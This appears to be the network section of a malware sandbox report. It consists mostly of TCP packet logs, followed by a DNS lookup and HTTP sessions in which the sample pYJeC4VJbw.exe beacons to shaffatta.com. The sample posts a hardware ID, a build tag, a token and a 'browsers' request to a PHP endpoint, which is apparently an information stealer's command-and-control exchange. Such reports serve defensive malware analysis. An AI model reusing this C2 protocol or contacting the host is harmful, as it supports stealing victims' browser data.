                                                                                                    May 3, 2024 11:21:41.142901897 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.143604994 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.143624067 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.143681049 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.143687963 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.143735886 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.144375086 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.144392967 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.144438982 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.144447088 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.144469023 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.144488096 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.145200014 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.145215034 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.145268917 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.145275116 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.145313025 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.146315098 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.146331072 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.146404982 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.146411896 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.146446943 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.147450924 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.147471905 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.147526026 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.147533894 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.147543907 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.147571087 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.148276091 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.148296118 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.148351908 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.148359060 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.148396969 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.149725914 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.149748087 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.149791956 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.149797916 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.149822950 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.149841070 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.150473118 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.150501966 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.150533915 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.150538921 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.150563002 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.150580883 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.153111935 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.153129101 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.153182030 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.153189898 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.153229952 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.154042006 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.154057980 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.154225111 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.154232025 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.154267073 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.155375004 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.155392885 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.155457973 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.155463934 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.155503035 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.156819105 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.156833887 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.156886101 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.156893015 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.156929016 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.157706976 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.157721996 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.157779932 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.157787085 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.157821894 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.159125090 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.159142971 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.159194946 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.159209013 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.159245968 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.160597086 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.160613060 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.160662889 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.160669088 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.160706043 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.161669016 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.161685944 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.161740065 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.161748886 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.161782980 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.162636042 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.162651062 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.162708044 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.162714958 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.162753105 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.163608074 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.163624048 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.163680077 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.163687944 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.163723946 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.164633989 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.164649010 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.164719105 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.164727926 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.164767027 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.166002035 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.166026115 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.166074991 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.166084051 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.166112900 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.166122913 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.166709900 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.166727066 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.166769028 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.166776896 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.166826010 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.166826010 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.167706966 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.167726040 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:41.167768955 CEST49749443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:41.167774916 CEST44349749168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:47.778639078 CEST49753443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.778680086 CEST49753443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.802990913 CEST49753443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.803016901 CEST44349753168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:47.880935907 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.880970955 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:47.881036043 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.890445948 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.890458107 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.249000072 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.249105930 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.249860048 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.249870062 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.250323057 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.250328064 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.702121019 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.702203989 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.702204943 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.702254057 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.702433109 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.702450991 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.734616041 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.734673977 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.734767914 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.734991074 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.735007048 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.091419935 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.091578960 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.092535019 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.092544079 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.092703104 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.092708111 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.092727900 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.092735052 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.562674046 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.562756062 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.562767982 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.562911987 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.562933922 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.562953949 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.562969923 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.563003063 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.568809032 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.568839073 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.568918943 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.569143057 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.569158077 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.928286076 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.928371906 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.928925991 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.928934097 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.929121017 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.929127932 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.929189920 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.929195881 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:50.395921946 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:50.395994902 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:50.396025896 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:50.396051884 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.724502087 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.724525928 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:51.724535942 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.724585056 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.752257109 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.752290010 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:51.752352953 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.753263950 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.753278971 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.110465050 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.110569000 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.114197016 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.114207983 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.114366055 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.114372969 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.114403963 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.114413977 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.580144882 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.580208063 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.580226898 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.580245018 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.580272913 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.580296993 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.581002951 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.581022978 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.581032991 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.581074953 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.605756044 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.605792999 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.605863094 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.606142998 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.606168032 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.962366104 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.962455988 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.962990999 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.963002920 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.963146925 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.963152885 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.963172913 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.963182926 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.426831007 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.426914930 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.426922083 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.426968098 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.427109957 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.427124977 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.427156925 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.427175999 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.439668894 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.439699888 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.439872980 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.440061092 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.440076113 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.797169924 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.797245979 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.797822952 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.797831059 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.798008919 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.798015118 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.798063040 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.798074007 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.263678074 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.263763905 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.263787985 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.263811111 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.263935089 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.263950109 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.263963938 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.264023066 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.269741058 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.269767046 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.269921064 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.270148993 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.270153046 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.627109051 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.627264023 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.627883911 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.627891064 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.628125906 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.628132105 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.628195047 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.628200054 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.098516941 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.098601103 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.098622084 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.098660946 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.098742962 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.098763943 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.098774910 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.098824978 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.104463100 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.104506016 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.104572058 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.104856968 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.104870081 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.461517096 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.461630106 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.462435961 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.462445974 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.462677956 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.462682962 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.462743998 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.462749004 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.931942940 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.932019949 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.932061911 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.932077885 CEST49761443192.168.2.4168.119.248.46
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 3, 2024 11:21:23.112216949 CEST | 55598 | 53 | 192.168.2.4 | 1.1.1.1
May 3, 2024 11:21:23.303493023 CEST | 53 | 55598 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 3, 2024 11:21:23.112216949 CEST | 192.168.2.4 | 1.1.1.1 | 0x5162 | Standard query (0) | shaffatta.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 3, 2024 11:21:23.303493023 CEST | 1.1.1.1 | 192.168.2.4 | 0x5162 | No error (0) | shaffatta.com | | 168.119.248.46 | A (IP address) | IN (0x0001) | false
                                                                                                    • shaffatta.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:24 UTC | 200 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIE
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 216
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
2024-05-03 09:21:24 UTC | 216 | OUT |
                                                                                                    Data Ascii: ------CFIECFIJDAAKEBGCGHIEContent-Disposition: form-data; name="hwid"E5D25B78E0D72284582127------CFIECFIJDAAKEBGCGHIEContent-Disposition: form-data; name="build"Install_2------CFIECFIJDAAKEBGCGHIE--
2024-05-03 09:21:24 UTC | 206 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:24 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 156
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Served-By: shaffatta.com
2024-05-03 09:21:24 UTC | 156 | IN |
                                                                                                    Data Ascii: ODc3ZTFhYmI0NzMwYTBjM2IxZjQyY2NhYjY3ZDdhMmFlMDYxZGRmMjQ3NDg3YjM5NWUyMzI3Mjg1OTMxZDdkMTA4MGQ0MzA2fGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDB8MHwxfDF8MXwxfDF8MXw=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:25 UTC | 200 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 268
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
2024-05-03 09:21:25 UTC | 268 | OUT |
                                                                                                    Data Ascii: ------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="message"browsers------GDBKKFHIEGD
2024-05-03 09:21:25 UTC | 207 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 1520
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Served-By: shaffatta.com
2024-05-03 09:21:25 UTC | 1520 | IN |
